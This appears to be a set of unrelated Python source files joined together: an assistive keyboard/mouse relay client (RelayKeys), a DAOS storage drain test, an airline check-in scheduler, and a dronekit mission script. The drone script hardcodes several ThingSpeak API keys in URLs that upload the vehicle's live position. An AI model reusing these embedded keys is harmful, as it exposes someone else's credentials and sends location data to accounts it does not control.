# self.setWindowIcon(icon)
# self.trayIcon.show()
# self.setWindowFlags(Qt.WindowStaysOnTopHint)
mainLayout = QVBoxLayout()
controlBar = QHBoxLayout()
keyboardControlSect = QVBoxLayout()
self.keyboardControlLabel = QLabel()
keyboardControlSect.addWidget(self.keyboardControlLabel)
self.keyboardToggleButton = QPushButton()
self.keyboardToggleButton.setText('Toggle: {}'.format(self.getShortcutText(
self._keyboard_toggle_key, self._keyboard_toggle_modifiers)))
self.keyboardToggleButton.setToolTip('Keyboard disable toggle')
self.keyboardToggleButton.clicked.connect(self.didClickKeyboardToggle)
keyboardControlSect.addWidget(self.keyboardToggleButton)
mouseControlSect = QVBoxLayout()
self.mouseControlLabel = QLabel()
mouseControlSect.addWidget(self.mouseControlLabel)
self.mouseToggleButton = QPushButton()
self.mouseToggleButton.setText('Toggle: {}'.format(
self.getShortcutText(self._mouse_toggle_key, self._mouse_toggle_modifiers)))
self.mouseToggleButton.setToolTip('Mouse disable toggle')
self.mouseToggleButton.clicked.connect(self.didClickMouseToggle)
mouseControlSect.addWidget(self.mouseToggleButton)
bleControlBar = QHBoxLayout()
self.bleConnectionSwitch = QPushButton()
self.bleConnectionSwitch.setText('BLE Switch')
self.bleConnectionSwitch.setToolTip('swicth ble device connection')
self.bleConnectionSwitch.clicked.connect(self.sendBleToggleCommand)
self.bleDeviceRead = QPushButton()
self.bleDeviceRead.setText('Cur Device: {}'.format(self._curBleDeviceName))
self.bleDeviceRead.setToolTip('swicth ble device connection')
self.bleDeviceRead.clicked.connect(self.readBleDeviceName)
bleControlBar.addWidget(self.bleConnectionSwitch)
bleControlBar.addWidget(self.bleDeviceRead)
self.updateTogglesStatus()
controlBar.addLayout(keyboardControlSect)
controlBar.addLayout(mouseControlSect)
mainLayout.addLayout(controlBar)
mainLayout.addLayout(bleControlBar)
self.keyboardStatusWidget = KeyboardStatusWidget()
mainLayout.addWidget(self.keyboardStatusWidget)
try:
self._show_last_n_chars = int(
clientconfig.get("show_last_n_chars", "20"), 10)
except ValueError:
self._show_last_n_chars = 0
if self._show_last_n_chars > 0:
self._last_n_chars = []
self._show_last_n_chars_label = QLabel()
label = self._show_last_n_chars_label
label.setContentsMargins(5, 5, 5, 5)
label.setAlignment(Qt.AlignVCenter)
label.setAutoFillBackground(True)
p = label.palette()
p.setColor(label.backgroundRole(), Qt.white)
label.setPalette(p)
fontsize = 10
label.setText("<font style='font-weight:bold;' size='{fontsize}'>{text}</font>"
.format(text="", fontsize=fontsize))
mainLayout.addWidget(label)
widget = QWidget(self)
self.setCentralWidget(widget)
layout = QVBoxLayout()
layout.addLayout(mainLayout)
widget.setLayout(layout)
self.setContentsMargins(0, 0, 0, 0)
self.setWindowTitle("Relay Keys Display")
self.resize(400, 250)
# New Menu
self.userMenu = self.menuBar()
# Device Menu
self.deviceMenu = QMenu("&Devices", self)
self.actionAddNewDevice = QAction("Add BLE Device", self)
self.actionAddNewDevice.triggered.connect(self.addDeviceButtonClicked)
self.deviceMenu.addAction(self.actionAddNewDevice)
self.removeDeviceMenu = QMenu("&Remove BLE Device", self)
self.actionResetDevices = QAction("Reset BLE Device List", self)
self.actionResetDevices.triggered.connect(self.resetDeviceListButtonClicked)
self.removeDeviceMenu.addAction(self.actionResetDevices)
self.removeDeviceMenu.addSeparator()
self.deviceMenu.addMenu(self.removeDeviceMenu)
self.actionRefreshDevices = QAction("Refresh Device List", self)
self.actionRefreshDevices.triggered.connect(self.refreshDeviceListButtonClicked)
self.deviceMenu.addAction(self.actionRefreshDevices)
self.userMenu.addMenu(self.deviceMenu)
# Help Menu
self.helpMenu = self.userMenu.addMenu("&Help")
self.helpMenuGitHubDoc = QAction("Git Hub Docs", self)
self.helpMenuGitHubDoc.triggered.connect(self.openGitHubUrl)
self.helpMenu.addAction(self.helpMenuGitHubDoc)
self.helpMenuAceCentre = QAction("Ace Centre", self)
self.helpMenuAceCentre.triggered.connect(self.openAceCentreUrl)
self.helpMenu.addAction(self.helpMenuAceCentre)
self.send_action('ble_cmd', 'devname')
self.send_action('ble_cmd', 'devlist')
def didShowWindow(self):
pass
@pyqtSlot()
def readBleDeviceName(self):
self.send_action('ble_cmd', 'devname')
@pyqtSlot()
def sendBleToggleCommand(self):
self.send_action('ble_cmd', 'switch')
@pyqtSlot()
def didClickKeyboardToggle(self):
self._keyboard_disabled = not self._keyboard_disabled
self.keyboardStatusWidget.updateStatusSignal.emit([], [], [])
self.updateTogglesStatus()
@pyqtSlot()
def didClickMouseToggle(self):
self._mouse_disabled = not self._mouse_disabled
self.updateTogglesStatus()
def getShortcutText(self, key, modifiers):
return " + ".join((key, ) + tuple(modifiers))
#Menu Functions
def openGitHubUrl(self):
url = QUrl('https://acecentre.github.io/RelayKeys/')
if not QDesktopServices.openUrl(url):
QMessageBox.warning(self, 'Open Url', 'Could not open url')
def openAceCentreUrl(self):
url = QUrl('https://acecentre.org.uk/')
if not QDesktopServices.openUrl(url):
QMessageBox.warning(self, 'Open Url', 'Could not open url')
def clearRemoveDeviceMenu(self):
self.removeDeviceMenu.clear()
self.actionResetDevices = QAction("Reset BLE Device List", self)
self.actionResetDevices.triggered.connect(self.resetDeviceListButtonClicked)
self.removeDeviceMenu.addAction(self.actionResetDevices)
self.removeDeviceMenu.addSeparator()
def resetDeviceListButtonClicked(self):
self.send_action('ble_cmd', 'devreset')
def refreshDeviceListButtonClicked(self):
self.send_action('ble_cmd', 'devlist')
def removeDeviceButtonClicked(self):
action = self.sender()
self.send_action('ble_cmd', 'devremove|' + action.text()[2:])
def addDeviceUpdateDialog(self, found):
self.send_action('ble_cmd', 'devlist')
if self.oldDevList != self.devList and len(self.devList):
self.BLEStatusLabel.setText("New Device Added")
self.addBLEDeviceOK.setEnabled(True)
self.workerBLE.stop()
self.BLEthread.quit()
self.BLEthread.wait()
if self.addBLEDialog.isVisible() == False:
self.workerBLE.stop()
self.BLEthread.quit()
self.BLEthread.wait()
def addDeviceButtonClicked(self):
class BLEWorker(QObject):
finished = pyqtSignal()
progress = pyqtSignal(int)
def __init__(self):
super(BLEWorker, self).__init__()
self._isRunning = True
def run(self):
while self._isRunning:
sleep(1)
self.progress.emit(2)
def stop(self):
self._isRunning = False
self.send_action('ble_cmd', 'devadd')
self.oldDevList = self.devList
self.devList = []
self.addBLEDialog = QDialog(self)
self.addBLEDialog.setWindowTitle("Add New BLE Device")
self.BLElayout = QVBoxLayout()
self.BLEStatusLabel = QLabel()
self.BLElayout.addWidget(self.BLEStatusLabel)
bleControlBar = QHBoxLayout()
self.addBLEDeviceOK = QPushButton()
self.addBLEDeviceOK.setText("OK")
self.addBLEDeviceOK.clicked.connect(self.addBLEDialog.accept)
self.addBLEDeviceCancel = QPushButton()
self.addBLEDeviceCancel.setText("Cancel")
self.addBLEDeviceCancel.clicked.connect(self.addBLEDialog.reject)
bleControlBar.addWidget(self.addBLEDeviceOK)
bleControlBar.addWidget(self.addBLEDeviceCancel)
self.BLElayout.addLayout(bleControlBar)
self.BLEStatusLabel.setText("Waiting for device...")
self.addBLEDialog.setLayout(self.BLElayout)
self.addBLEDialog.resize(400, 125)
self.BLEthread = QThread()
self.workerBLE = BLEWorker()
self.workerBLE.moveToThread(self.BLEthread)
self.BLEthread.started.connect(self.workerBLE.run)
self.workerBLE.finished.connect(self.BLEthread.quit)
self.workerBLE.finished.connect(self.workerBLE.deleteLater)
self.BLEthread.finished.connect(self.BLEthread.deleteLater)
self.workerBLE.progress.connect(self.addDeviceUpdateDialog)
self.addBLEDeviceOK.setEnabled(False)
self.BLEthread.start()
self.BLEthread.finished.connect(
lambda: self.addBLEDeviceOK.setEnabled(True)
)
self.addBLEDialog.exec()
def updateTogglesStatus(self):
fontsize = 5
self.keyboardControlLabel.setText("<font style='color: {color}; font-weight:bold;' size='{fontsize}'>{text}</font>"
.format(text="Keyboard Disabled" if self._keyboard_disabled else "Keyboard Enabled", fontsize=fontsize,
color="#777" if self._keyboard_disabled else "#222"))
self.mouseControlLabel.setText("<font style='color: {color}; font-weight:bold;' size='{fontsize}'>{text}</font>"
.format(text="Mouse Disabled" if self._mouse_disabled else "Mouse Enabled", fontsize=fontsize,
color="#777" if self._mouse_disabled else "#222"))
def updateShowLastChars(self):
label = self._show_last_n_chars_label
if label is None:
return
fontsize = 10
text = " ".join(self._last_n_chars)
label.setText("<font style='font-weight:bold;' size='{fontsize}'>{text}</font>"
.format(text=text, fontsize=fontsize))
def createTrayIcon(self):
self.trayIconMenu = QMenu(self)
self.trayIconMenu.addAction(
QAction("Quit", self, triggered=self.onQuit))
# self.trayIconMenu.addSeparator()
self.trayIcon = QSystemTrayIcon(self)
self.trayIcon.setContextMenu(self.trayIconMenu)
def onQuit(self):
self._client_queue.put(("EXIT",))
app.quit()
# exit(0)
def closeEvent(self, event):
self._client_queue.put(("EXIT",))
def initHooks(self):
hm = PyHook3.HookManager()
hm.KeyDown = self.onKeyboardDown
hm.KeyUp = self.onKeyboardUp
hm.HookKeyboard()
hm.MouseAll = self.onMouseEvent
hm.HookMouse()
self._hookmanager = hm
# pythoncom.PumpMessages()
def showErrorMessage(self, msg):
QMessageBox.critical(None, "RelayKeys Error", msg)
self._keyboard_disabled = True
def client_worker(self, queue):
lasttime = time()
while True:
ctime = time()
sleeptime = 0.050 - (ctime - lasttime)
if sleeptime > 0:
sleep(sleeptime)
lasttime = ctime
inputlist = []
try:
while True:
inputlist.append(queue.get(False))
queue.task_done()
except EmptyQueue:
if len(inputlist) == 0:
continue
have_exit = len(
list(filter(lambda a: a[0] == 'EXIT', inputlist))) > 0
if have_exit:
break
# expecting the rest are actions
# merge mousemove actions
mousemove_list = tuple(
filter(lambda a: a[0] == 'mousemove', inputlist))
if len(mousemove_list) > 1:
inputlist = list(
filter(lambda a: a[0] != 'mousemove', inputlist))
mousemove = ['mousemove']
for i in range(1, 5):
mousemove.append(
sum(map(lambda a: a[i] if len(a) > i else 0, mousemove_list)))
inputlist.append(tuple(mousemove))
# send actions
if not self.client_send_actions(inputlist):
# an error occurred, empty out the queue
try:
while True:
queue.get(False)
queue.task_done()
except EmptyQueue:
pass
def client_send_actions(self, actions):
try:
ret = self.client.actions(actions)
if 'result' not in ret:
logging.error("actions {} response error: {}".format(
", ".join(map(str, actions)), ret.get("error", "undefined")))
self.showErrorMessageSignal.emit("Failed to send the message!")
else:
result = 0
for action in actions:
if action[0] == 'ble_cmd':
if action[1] == 'devname':
self._curBleDeviceName = ret['result'][result]
self.bleDeviceRead.setText(
'Cur Device: {}'.format(self._curBleDeviceName))
if action[1] == 'devlist':
self.clearRemoveDeviceMenu()
self.devList = []
for device in ret['result'][result]:
if 'Device found in list - ' not in device \
and 'Disconnected - Device already present in list' not in device \
and 'ERROR:' not in device \
and 'OK' not in device \
and 'SUCCESS' not in device:
self.removeDeviceMenu.addAction(device, self.removeDeviceButtonClicked)
self.devList.append(device)
if action[1] == 'devreset':
self.clearRemoveDeviceMenu()
self.devList = []
if 'devremove' in action[1]:
self.send_action('ble_cmd', 'devlist')
result = result + 1
logging.info("actions {} response: {}".format(
", ".join(map(str, actions)), ret["result"]))
return True
except:
logging.error("actions {} raise: {}".format(
", ".join(map(str, actions)), traceback.format_exc()))
self.showErrorMessageSignal.emit("Failed to send the message!")
return False
def client_send_action(self, action, *args):
try:
func = getattr(self.client, action, None)
if func == None:
raise ValueError("unknown action: {}".format(action))
ret = func(*args)
if 'result' not in ret:
logging.error("{} ({}) response error: {}".format(
action, ", ".join(map(str, args)), ret.get("error", "undefined")))
# self.showErrorMessageSignal.emit("Failed to send the message!")
else:
logging.info("{} ({}) response: {}".format(
action, ", ".join(map(str, args)), ret["result"]))
return True
except:
logging.error("{} ({}) raise: {}".format(
action, ", ".join(map(str, args)), traceback.format_exc()))
# self.showErrorMessageSignal.emit("Failed to send the message!")
return False
def send_action(self, action, *args):
self._client_queue.put((action,) + args)
def checkShortcutTrigger(self, key, mods, tkey, tmods):
match = False
if ((tkey is None and len(tmods) > 0) or key == tkey) and \
len(tmods) == len(mods):
match = True
for tmod in tmods:
if tmod not in mods:
match = False
break
return match
def _keyboardToggleCheck(self, key):
if self.checkShortcutTrigger(key, self._modifiers, self._keyboard_toggle_key, self._keyboard_toggle_modifiers):
self._keyboard_disabled = not self._keyboard_disabled
self.keyboardStatusWidget.updateStatusSignal.emit([], [], [])
self.updateTogglesStatus()
return False
elif self.checkShortcutTrigger(key, self._modifiers, self._mouse_toggle_key, self._mouse_toggle_modifiers):
self._mouse_disabled = not self._mouse_disabled
self.updateTogglesStatus()
return False
return None
def onKeyboardDown(self, event):
key = keysmap.get(event.KeyID, None)
mod = modifiers_map.get(event.KeyID, None)
if key is not None:
if key not in self._keys:
self._keys.append(key)
elif mod is not None:
if mod not in self._modifiers:
self._modifiers.append(mod)
elif event.KeyID not in self._unknown_keys:
self._unknown_keys.append(event.KeyID)
ret = self._keyboardToggleCheck(key)
if ret is not None:
return ret
if self._keyboard_disabled:
return True
self.updateKeyboardState()
if key is not None:
if self._show_last_n_chars > 0:
chr = char_keysmap.get(event.KeyID, None)
if chr is not None and len(chr) > 0:
if isinstance(chr, (tuple)):
chr = chr[0] if len(chr) == 1 or \
("LSHIFT" not in self._modifiers and "RSHIFT" not in self._modifiers) else chr[1]
while len(self._last_n_chars) >= self._show_last_n_chars:
self._last_n_chars.pop(0)
self._last_n_chars.append(chr)
self.updateShowLastChars()
self.send_action('keyevent', key, self._modifiers, True)
return False
elif mod is not None:
# set the modifiers
self.send_action('keyevent', None, self._modifiers, False)
return False
return True
def onKeyboardUp(self, event):
key = keysmap.get(event.KeyID, None)
mod = modifiers_map.get(event.KeyID, None)
if key is not None and key in self._keys:
self._keys.remove(key)
elif mod is not None and mod in self._modifiers:
self._modifiers.remove(mod)
else:
try:
self._unknown_keys.remove(event.KeyID)
except:
pass
if self._keyboard_disabled:
return True
self.updateKeyboardState()
if key is not None:
self.send_action('keyevent', key, self._modifiers, False)
return False
elif mod is not None:
# set the modifiers
self.send_action('keyevent', None, self._modifiers, False)
return False
return True
def onMouseEvent(self, event):
if self._mouse_disabled:
return True
if event.Message == PyHook3.HookConstants.WM_MOUSEMOVE:
if self._last_mouse_pos is None:
self._last_mouse_pos = event.Position
return True
dx, dy = event.Position[0] - \
self._last_mouse_pos[0], event.Position[1] - \
self._last_mouse_pos[1]
self.send_action('mousemove', dx, dy)
elif event.Message == PyHook3.HookConstants.WM_LBUTTONDOWN:
self.send_action('mousebutton', 'l', 'press')
elif event.Message == PyHook3.HookConstants.WM_LBUTTONUP:
self.send_action('mousebutton', '0')
elif event.Message == PyHook3.HookConstants.WM_LBUTTONDBLCLK:
self.send_action('mousebutton', 'l', 'doubleclick')
elif event.Message == PyHook3.HookConstants.WM_RBUTTONDOWN:
self.send_action('mousebutton', 'r', 'press')
elif event.Message == PyHook3.HookConstants.WM_RBUTTONUP:
self.send_action('mousebutton', '0')
elif event.Message == PyHook3.HookConstants.WM_RBUTTONDBLCLK:
self.send_action('mousebutton', 'r', 'doubleclick')
elif event.Message == PyHook3.HookConstants.WM_MBUTTONDOWN:
self.send_action('mousebutton', 'm', 'press')
elif event.Message == PyHook3.HookConstants.WM_MBUTTONUP:
self.send_action('mousebutton', '0')
elif event.Message == PyHook3.HookConstants.WM_MBUTTONDBLCLK:
self.send_action('mousebutton', 'm', 'doubleclick')
elif event.Message == PyHook3.HookConstants.WM_MOUSEWHEEL:
self.send_action('mousemove', 0, 0, event.Wheel)
return False
def onUpdateKeyState(self):
"""This update event handler is used to update shown state of keyboard
"""
self.keyboardStatusWidget.updateStatusSignal.emit(
self._keys, self._modifiers, self._unknown_keys)
def updateKeyboardState(self):
if self._keystate_update_timer != None:
self._keystate_update_timer.cancel()
self._keystate_update_timer = Timer(0.05, self.onUpdateKeyState)
self._keystate_update_timer.start()
def main():
args = parser.parse_args()
# init logger
logger = logging.getLogger()
logging.getLogger().addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
if args.debug:
logger.setLevel(logging.DEBUG)
config = ConfigParser()
dirname = os.path.dirname(os.path.realpath(sys.argv[0]))
if args.config is None:
config.read([
os.path.expanduser('~/.relaykeys.cfg'),
os.path.join(dirname, 'relaykeys.cfg'),
])
else:
config.read([args.config])
if "client" not in config.sections():
config["client"] = {}
app = QApplication(sys.argv)
try:
QApplication.setQuitOnLastWindowClosed(True)
window = Window(args, config)
window.show()
window.didShowWindow()
return app.exec_()
except:
raise
#QMessageBox.critical(None, "RelayKeys Fatal Error", "{}".format(traceback.format_exc()))
# return 1
if __name__ == '__main__':
ret = main()
exit(ret)
|
osa_online_drain.py | #!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import time
import random
import threading
from test_utils_pool import TestPool
from write_host_file import write_host_file
from osa_utils import OSAUtils
from daos_utils import DaosCommand
from apricot import skipForTicket
class OSAOnlineDrain(OSAUtils):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server Online Drain test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.dmg_command = self.get_dmg_command()
self.daos_command = DaosCommand(self.bin)
self.ior_test_sequence = self.params.get(
"ior_test_sequence", '/run/ior/iorflags/*')
self.test_oclass = self.params.get("oclass", '/run/test_obj_class/*')
# Recreate the client hostfile without slots defined
self.hostfile_clients = write_host_file(
self.hostlist_clients, self.workdir, None)
self.pool = None
self.dmg_command.exit_status_exception = True
def run_online_drain_test(self, num_pool, oclass=None, app_name="ior"):
"""Run the Online drain without data.
Args:
num_pool(int) : total pools to create for testing purposes.
oclass(str) : Object class type (RP_2G1, etc)
app_name(str) : application to run on parallel (ior or mdtest)
Defaults to ior.
"""
# Create a pool
pool = {}
target_list = []
if oclass is None:
oclass = self.ior_cmd.dfs_oclass.value
test_seq = self.ior_test_sequence[0]
drain_servers = (len(self.hostlist_servers) * 2) - 1
# Exclude target : random two targets (target idx : 0-7)
n = random.randint(0, 6)
target_list.append(n)
target_list.append(n+1)
t_string = "{},{}".format(target_list[0], target_list[1])
# Drain one of the ranks (or server)
rank = random.randint(1, drain_servers)
for val in range(0, num_pool):
pool[val] = TestPool(self.context, self.get_dmg_command())
pool[val].get_params(self)
pool[val].create()
pool[val].set_property("reclaim", "disabled")
# Drain the rank and targets
for val in range(0, num_pool):
threads = []
self.pool = pool[val]
# Instantiate aggregation
if self.test_during_aggregation is True:
for _ in range(0, 2):
self.run_ior_thread("Write", oclass, test_seq)
self.delete_extra_container(self.pool)
# The following thread runs while performing osa operations.
if app_name == "ior":
threads.append(threading.Thread(target=self.run_ior_thread,
kwargs={"action": "Write",
"oclass": oclass,
"test": test_seq}))
else:
threads.append(threading.Thread(target=self.run_mdtest_thread))
# Launch the IOR threads
for thrd in threads:
self.log.info("Thread : %s", thrd)
thrd.start()
time.sleep(1)
# Wait the threads to write some data before drain.
time.sleep(5)
self.pool.display_pool_daos_space("Pool space: Beginning")
pver_begin = self.get_pool_version()
self.log.info("Pool Version at the beginning %s", pver_begin)
output = self.dmg_command.pool_drain(self.pool.uuid,
rank, t_string)
self.print_and_assert_on_rebuild_failure(output)
pver_drain = self.get_pool_version()
self.log.info("Pool Version after drain %s", pver_drain)
# Check pool version incremented after pool exclude
self.assertTrue(pver_drain > pver_begin,
"Pool Version Error: After drain")
# Wait to finish the threads
for thrd in threads:
thrd.join()
if not self.out_queue.empty():
self.assert_on_exception()
for val in range(0, num_pool):
display_string = "Pool{} space at the End".format(val)
self.pool = pool[val]
self.pool.display_pool_daos_space(display_string)
self.run_ior_thread("Read", oclass, test_seq)
self.container = self.pool_cont_dict[self.pool][0]
kwargs = {"pool": self.pool.uuid,
"cont": self.container.uuid}
output = self.daos_command.container_check(**kwargs)
self.log.info(output)
@skipForTicket("DAOS-7289")
def test_osa_online_drain(self):
"""Test ID: DAOS-4750
Test Description: Validate Online drain with checksum
enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_with_csum
"""
self.log.info("Online Drain : With Checksum")
self.run_online_drain_test(1)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_no_csum(self):
"""Test ID: DAOS-6909
Test Description: Validate Online drain without enabling
checksum.
:avocado: tags=all,pr,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa
:avocado: tags=osa_drain,online_drain,online_drain_without_csum
"""
self.log.info("Online Drain : No Checksum")
self.test_with_checksum = self.params.get("test_with_checksum",
'/run/checksum/*')
self.run_online_drain_test(1)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_oclass(self):
"""Test ID: DAOS-6909
Test Description: Validate Online drain with different
object class.
:avocado: tags=all,pr,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_oclass
"""
self.log.info("Online Drain : Oclass")
for oclass in self.test_oclass:
self.run_online_drain_test(1, oclass=oclass)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_with_aggregation(self):
"""Test ID: DAOS-6909
Test Description: Validate Online drain with different
object class.
:avocado: tags=all,pr,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_with_aggregation
"""
self.log.info("Online Drain : Aggregation")
self.test_during_aggregation = self.params.get("test_with_aggregation",
'/run/aggregation/*')
self.run_online_drain_test(1)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_mdtest(self):
"""Test ID: DAOS-4750
Test Description: Validate Online drain with mdtest
running during the testing.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_mdtest
"""
self.log.info("Online Drain : With Mdtest")
self.run_online_drain_test(1, app_name="mdtest")
|
flight.py | from __future__ import annotations
from datetime import datetime, timedelta
import time
from threading import Thread
from typing import Any, Dict, Optional, TYPE_CHECKING
import pytz
import requests
from .general import make_request
if TYPE_CHECKING:
from account import Account
CHECKIN_URL = "mobile-air-operations/v1/mobile-air-operations/page/check-in/"
class Flight:
def __init__(self, account: Optional[Account], confirmation_number: str, flight: Flight) -> None:
self.account = account
self.confirmation_number = confirmation_number
self.departure_time = None
self.departure_airport = None
self.destination_airport = None
self._get_flight_info(flight)
x = Thread(target=self._set_check_in)
x.start()
def _get_flight_info(self, flight: Flight) -> None:
self.departure_airport = flight["departureAirport"]["name"]
self.destination_airport = flight["arrivalAirport"]["name"]
self.departure_time = self._get_flight_time(flight)
def _get_flight_time(self, flight: Flight) -> datetime:
flight_date = f"{flight['departureDate']} {flight['departureTime']}"
departure_airport_code = flight['departureAirport']['code']
airport_timezone = self._get_airport_timezone(departure_airport_code)
flight_time = self._convert_to_utc(flight_date, airport_timezone)
return flight_time
def _get_airport_timezone(self, airport_code: str) -> Any:
airport_info = requests.post("https://openflights.org/php/apsearch.php", data={"iata": airport_code})
airport_timezone = pytz.timezone(airport_info.json()['airports'][0]['tz_id'])
return airport_timezone
def _convert_to_utc(self, flight_date: str, airport_timezone: Any) -> datetime:
flight_date = datetime.strptime(flight_date, "%Y-%m-%d %H:%M")
flight_time = airport_timezone.localize(flight_date)
utc_time = flight_time.astimezone(pytz.utc).replace(tzinfo=None)
return utc_time
def _set_check_in(self) -> None:
# Starts to check in five seconds early in case the Southwest server is ahead of your server
checkin_time = self.departure_time - timedelta(days=1, seconds=5)
current_time = datetime.utcnow()
if checkin_time > current_time:
print(f"Scheduling checkin to flight from '{self.departure_airport}' to '{self.destination_airport}' "
f"for {self.account.first_name} {self.account.last_name} at {checkin_time} UTC\n")
# Refresh headers 10 minutes before to make sure they are valid
sleep_time = (checkin_time - current_time - timedelta(minutes=10)).total_seconds()
# Only try to refresh the headers if the checkin is more than ten minutes away
if sleep_time > 0:
time.sleep(sleep_time)
# Check if the check in was started manually or from logging in
# To-Do: Make one function to retrieve headers
if self.account.username is None:
self.account.get_checkin_info(self.confirmation_number)
else:
self.account.get_flights()
current_time = datetime.utcnow()
sleep_time = (checkin_time - current_time).total_seconds()
time.sleep(sleep_time)
self._check_in()
self.account.flights.remove(self)
def _check_in(self) -> None:
print(f"Checking in to flight from '{self.departure_airport}' to '{self.destination_airport}' "
f"for {self.account.first_name} {self.account.last_name}\n")
info = {"first-name": self.account.first_name, "last-name": self.account.last_name}
site = CHECKIN_URL + self.confirmation_number
response = make_request("GET", site, self.account, info)
info = response['checkInViewReservationPage']['_links']['checkIn']
site = f"mobile-air-operations{info['href']}"
reservation = make_request("POST", site, self.account, info['body'])
self._print_results(reservation['checkInConfirmationPage'])
def _print_results(self, boarding_pass: Dict[str, Any]) -> None:
print(f"Successfully checked in to flight from '{self.departure_airport}' to '{self.destination_airport}'!")
for flight in boarding_pass['flights']:
for passenger in flight['passengers']:
print(f"{passenger['name']} got {passenger['boardingGroup']}{passenger['boardingPosition']}!")
print()
|
mission_basic.py | from __future__ import print_function
from dronekit import connect, VehicleMode, LocationGlobalRelative, LocationGlobal, Command
import time
import math
from pymavlink import mavutil
import urllib
import re
from bs4 import BeautifulSoup
import threading
#Set up option parsing to get connection string
import argparse
parser = argparse.ArgumentParser(description='Demonstrates basic mission operations.')
parser.add_argument('--connect',
help="vehicle connection target string. If not specified, SITL automatically started and used.")
args = parser.parse_args()
connection_string = args.connect
sitl = None
#Start SITL if no connection string specified
if not connection_string:
import dronekit_sitl
sitl = dronekit_sitl.start_default()
connection_string = sitl.connection_string()
# Connect to the Vehicle
print('Connecting to vehicle on: %s' % connection_string)
vehicle = connect(connection_string, wait_ready=True)
def get_location_metres(original_location, dNorth, dEast):
"""
Returns a LocationGlobal object containing the latitude/longitude `dNorth` and `dEast` metres from the
specified `original_location`. The returned Location has the same `alt` value
as `original_location`.
The function is useful when you want to move the vehicle around specifying locations relative to
the current vehicle position.
The algorithm is relatively accurate over small distances (10m within 1km) except close to the poles.
For more information see:
http://gis.stackexchange.com/questions/2951/algorithm-for-offsetting-a-latitude-longitude-by-some-amount-of-meters
"""
earth_radius=6378137.0 #Radius of "spherical" earth
#Coordinate offsets in radians
dLat = dNorth/earth_radius
dLon = dEast/(earth_radius*math.cos(math.pi*original_location.lat/180))
#New position in decimal degrees
newlat = original_location.lat + (dLat * 180/math.pi)
newlon = original_location.lon + (dLon * 180/math.pi)
return LocationGlobal(newlat, newlon,original_location.alt)
def location():
while (True):
data1=urllib.urlopen("https://api.thingspeak.com/update?api_key=FY75NMA95F11M8OA&field1="+ str(vehicle.location.global_relative_frame.lat));
print (data1);
print (vehicle.location.global_relative_frame.lat);
data2=urllib.urlopen("https://api.thingspeak.com/update?api_key=U6MA881OO5AM461D&field1="+ str(vehicle.location.global_relative_frame.lon));
print (data2);
print (vehicle.location.global_relative_frame.lon);
data3=urllib.urlopen("https://api.thingspeak.com/update?api_key=N006A2QTZGIN5H6M&field1="+ str(vehicle.location.global_relative_frame.alt));
print (data3);
print (vehicle.location.global_relative_frame.alt);
threading.Thread(target=location).start()
def get_distance_metres(aLocation1, aLocation2):
"""
Returns the ground distance in metres between two LocationGlobal objects.
This method is an approximation, and will not be accurate over large distances and close to the
earth's poles. It comes from the ArduPilot test code:
https://github.com/diydrones/ardupilot/blob/master/Tools/autotest/common.py
"""
dlat = aLocation2.lat - aLocation1.lat
dlong = aLocation2.lon - aLocation1.lon
return math.sqrt((dlat*dlat) + (dlong*dlong)) * 1.113195e5
def distance_to_current_waypoint():
"""
Gets distance in metres to the current waypoint.
It returns None for the first waypoint (Home location).
"""
nextwaypoint = vehicle.commands.next
if nextwaypoint==0:
return None
missionitem=vehicle.commands[nextwaypoint-1] #commands are zero indexed
lat = missionitem.x
lon = missionitem.y
alt = missionitem.z
targetWaypointLocation = LocationGlobalRelative(lat,lon,alt)
distancetopoint = get_distance_metres(vehicle.location.global_frame, targetWaypointLocation)
return distancetopoint
def download_mission():
"""
Download the current mission from the vehicle.
"""
cmds = vehicle.commands
cmds.download()
cmds.wait_ready() # wait until download is complete.
def adds_square_mission(aLocation, aSize):
"""
Adds a takeoff command and four waypoint commands to the current mission.
The waypoints are positioned to form a square of side length 2*aSize around the specified LocationGlobal (aLocation).
The function assumes vehicle.commands matches the vehicle mission state
(you must have called download at least once in the session and after clearing the mission)
"""
cmds = vehicle.commands
print(" Clear any existing commands")
cmds.clear()
print(" Define/add new commands.")
# Add new commands. The meaning/order of the parameters is documented in the Command class.
#Add MAV_CMD_NAV_TAKEOFF command. This is ignored if the vehicle is already in the air.
cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_TAKEOFF, 0, 0, 0, 0, 0, 0, 0, 0, 10))
#Define the four MAV_CMD_NAV_WAYPOINT locations and add the commands
point1 = get_location_metres(aLocation, aSize, -aSize)
point2 = get_location_metres(aLocation, aSize, aSize)
point3 = get_location_metres(aLocation, -aSize, aSize)
point4 = get_location_metres(aLocation, -aSize, -aSize)
cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 0, 0, 0, 0, 0, 0, point1.lat, point1.lon, 11))
cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 0, 0, 0, 0, 0, 0, point2.lat, point2.lon, 12))
cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 0, 0, 0, 0, 0, 0, point3.lat, point3.lon, 13))
